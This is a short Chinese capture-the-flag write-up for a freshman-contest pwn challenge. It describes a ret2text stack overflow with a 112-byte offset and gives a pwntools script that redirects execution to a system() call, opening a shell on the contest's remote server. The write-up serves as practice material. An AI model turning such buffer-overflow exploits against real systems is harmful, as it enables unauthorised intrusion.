[青海民族大学 2025 新生赛]签到题2

Problem: [青海民族大学 2025 新生赛]签到题2

思路

• 经过动态调试发现输入点距离返回地址的偏移量为112（一定要通过动态调试，IDA显示的偏移量错误），发现secure函数中调用system函数，我们直接将返回地址修改到执行system函数处的代码段地址即可

EXP

#coding=utf-8
from pwn import *
#-------------------------------------------------------------------#
#context(arch = 'amd64', os = 'linux', log_level = 'debug')
#context(arch = 'i386', os = 'linux', log_level = 'debug')
context.log_level = 'debug'
Address = 'node1.anna.nssctf.cn'
Port = 28587
io = remote(Address, Port)
#io = process('./pwn')
#-------------------------------------------------------------------#
def get_addr64():
	return u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
def get_addr32():
	return u32(io.recvuntil(b'\xf7')[-4:])
#-------------------------------------------------------------------#

system = 0x804863A

payload = cyclic(112) + p32(system)
io.recvuntil("There is something amazing here, do you know anything?\n")
io.sendline(payload)
io.interactive()
​

总结

这是一道很基础的ret2text的题，细节方面需要自己去把控